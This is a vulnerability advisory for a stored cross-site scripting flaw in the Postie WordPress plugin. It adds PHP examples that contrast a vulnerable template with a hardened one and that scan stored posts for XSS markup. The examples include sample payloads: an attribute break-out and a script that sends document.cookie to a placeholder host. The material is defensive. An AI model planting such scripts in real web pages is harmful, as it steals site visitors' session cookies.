CVE-2025-63020

2025-12-31

Lifecycle Timeline

CVE Published: Dec 31, 2025 - 14:15 (nvd)
Analysis Generated: Apr 01, 2026 - 17:44 (vuln.today)

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wayne Allen Postie postie allows Stored XSS. This issue affects Postie: from n/a through <= 1.9.73.

Analysis

Stored cross-site scripting (XSS) in the Wayne Allen Postie WordPress plugin, through version 1.9.73, lets an authenticated attacker inject script into content that the plugin stores and later renders, so the payload executes in the browsers of other users who view the affected page. The root cause is improper neutralization of input during web page generation: data the plugin writes to its data store is not escaped for the HTML context in which it is later output, so the payload persists and fires on every view. No public exploit code or active exploitation had been identified at the time of analysis, and the EPSS score is very low (0.04th percentile), which suggests limited real-world interest; the size of the plugin's installed base is not reported here, so that signal should not be read as a measure of exposure.

Technical Context

This vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation), the class of failures where untrusted data reaches an HTML output without being encoded for the context it lands in (element text, attribute value, URL, script). Postie implements email-to-post functionality for WordPress, so its untrusted input is inbound mail, which an attacker controls end to end; the plugin fails to sanitize or escape user-controlled data before rendering it in HTML (the advisory does not say which field). Stored XSS differs from reflected XSS in that the payload persists in the application database and executes for every user who views the compromised content, with no per-victim link or social engineering required. The affected product is listed under the identifier wp/postie; the advisory gives no lower bound on the affected range (from n/a) and an upper bound of 1.9.73, so every release up to and including 1.9.73 should be treated as affected.
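The pattern described above, as an added example that is not Postie's code: an email-to-post pipeline stores raw mail fields as a post, a vulnerable template interpolates them straight into HTML, and a hardened template encodes each value for the context it lands in. The `esc_html`/`esc_attr` shims, the sample email and the post structure are assumptions made so the file runs with plain `php` outside WordPress.

```php
<?php
// Added example, not code from the Postie plugin: shows how an email-to-post
// pipeline turns attacker-controlled email fields into stored XSS, and what
// context-correct output encoding looks like. Runs with plain `php` outside
// WordPress; inside WordPress the shims below give way to the real helpers.
declare(strict_types=1);

// Shims (assumption: same behaviour as the WordPress helpers of these names
// for this input) so the file runs without WordPress loaded.
if (!function_exists('esc_html')) {
    function esc_html(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    }
}

// Constructed inbound email. Every byte here is chosen by the sender.
$email = [
    'subject' => 'Weekly report" onmouseover="alert(document.cookie)',
    'body'    => "Hi all,\n<script>fetch('//evil.invalid/?c=' + document.cookie)</script>",
];

// Store step: the raw fields are persisted as a post. Storing raw input is
// acceptable only if every later render encodes for its output context.
$stored_post = ['title' => $email['subject'], 'content' => $email['body']];

// Vulnerable render: raw interpolation into an attribute and into element text.
function render_vulnerable(array $post): string
{
    return '<h2 title="' . $post['title'] . '">' . $post['title'] . "</h2>\n"
         . '<div class="post">' . $post['content'] . "</div>\n";
}

// Hardened render: encode for the exact context the value lands in.
// Attribute values get esc_attr(), element text gets esc_html(). If the body
// must keep safe HTML, WordPress's wp_kses_post() is the filter to use instead
// of esc_html(); plain-text treatment is the conservative default shown here.
function render_hardened(array $post): string
{
    return '<h2 title="' . esc_attr($post['title']) . '">' . esc_html($post['title']) . "</h2>\n"
         . '<div class="post">' . esc_html($post['content']) . "</div>\n";
}

// Crude check, only to make the difference visible in this example: does the
// rendered fragment still contain a script element or an attribute break-out?
function looks_executable(string $html): bool
{
    return stripos($html, '<script') !== false
        || preg_match('/"\s+on[a-z]+\s*=/i', $html) === 1;
}

$bad  = render_vulnerable($stored_post);
$good = render_hardened($stored_post);

echo "VULNERABLE render (executes for every viewer of the post):\n$bad";
echo 'executable markup present: ', looks_executable($bad) ? 'yes' : 'no', "\n\n";
echo "HARDENED render:\n$good";
echo 'executable markup present: ', looks_executable($good) ? 'yes' : 'no', "\n";
```

Run it with `php example.php`. The same stored title carries two payloads, one that breaks out of the `title` attribute and one that is a plain script element, which is why the fix is chosen per output context rather than by "cleaning" the input once at storage time.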

Affected Products

Wayne Allen Postie WordPress plugin, all versions up to and including 1.9.73 (the advisory states no lower bound). The plugin is listed under the identifier wp/postie and is distributed through the official WordPress plugin repository. Any WordPress installation with Postie 1.9.73 or earlier installed and active is exposed; copies that are installed but inactive should be updated as well before they are re-enabled.

Remediation

Update the Wayne Allen Postie plugin to version 1.9.74 or later, which addresses the input neutralization failure. WordPress administrators can go to Plugins > Installed Plugins, locate Postie and click Update if one is offered, or install the patched version from the official WordPress plugin repository; the advisory for this issue is published at https://patchstack.com/database/Wordpress/Plugin/postie/vulnerability/wordpress-postie-plugin-1-9-73-cross-site-scripting-xss-vulnerability. If immediate patching is not possible, temporarily deactivate the Postie plugin to close the injection path while the update is staged; note that deactivation stops new injections but does not remove anything already stored, and if the payload sits in post content it will keep rendering, because posts created by Postie are ordinary WordPress posts. Review content created or modified through Postie in recent months to identify and remove any stored XSS payloads.
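A triage scan for the review step above, as an added example that is not part of Postie or of vuln.today: it runs a set of broad XSS-markup patterns over post rows and lists the ones that deserve a human look. The row layout (`ID`, `post_title`, `post_content` from `wp_posts`) and the sample rows are assumptions; the rows are constructed so the script runs offline.

```php
<?php
// Added example, not code from Postie or vuln.today: a triage scan for the
// "review content created through Postie" step. It flags stored post rows
// whose title or content contains markup typical of XSS payloads so a human
// can review them. Assumption: the rows come from the wp_posts table
// (ID, post_title, post_content), exported for instance with
// `wp db query` and loaded into $rows; the rows below are constructed samples.
declare(strict_types=1);

// Patterns are deliberately broad: this produces a shortlist for manual
// review, not proof of exploitation, and benign text can match (e.g. "one=").
const SUSPICIOUS_PATTERNS = [
    'script element'       => '/<\s*script\b/i',
    'inline event handler' => '/\bon[a-z]+\s*=/i',
    'javascript: URL'      => '/javascript\s*:/i',
    'iframe/object/embed'  => '/<\s*(iframe|object|embed)\b/i',
    'svg/math element'     => '/<\s*(svg|math)\b/i',
    'data: URL with HTML'  => '/data\s*:\s*text\/html/i',
];

/** Returns the list of "field: reason" hits for one wp_posts row. */
function scan_post(array $row): array
{
    $hits = [];
    foreach (['post_title', 'post_content'] as $field) {
        $value = (string) ($row[$field] ?? '');
        foreach (SUSPICIOUS_PATTERNS as $reason => $pattern) {
            if (preg_match($pattern, $value) === 1) {
                $hits[] = "$field: $reason";
            }
        }
    }
    return $hits;
}

// Constructed sample rows standing in for a wp_posts export.
$rows = [
    ['ID' => 101, 'post_title' => 'Minutes from Monday',
     'post_content' => '<p>Action items attached.</p>'],
    ['ID' => 102, 'post_title' => 'Report" onmouseover="alert(1)',
     'post_content' => '<p>See below</p><script>fetch("//evil.invalid/?c="+document.cookie)</script>'],
    ['ID' => 103, 'post_title' => 'Link roundup',
     'post_content' => '<a href="javascript:alert(document.domain)">click</a>'],
];

foreach ($rows as $row) {
    $hits = scan_post($row);
    if ($hits === []) {
        continue;
    }
    printf("post %d (%s): %s\n", $row['ID'], $row['post_title'], implode('; ', $hits));
}
```

Posts 102 and 103 are reported, 101 is not. On a live site a cheap first pass is a query such as `SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%<script%'`, but the pattern list above catches the attribute and URL variants that a single `LIKE` misses; clean matches by editing the post (or unpublishing it) rather than by trusting the rendering layer to neutralize them.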

Priority Score

Score: 0 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.0
CVSS: +0
POC: 0
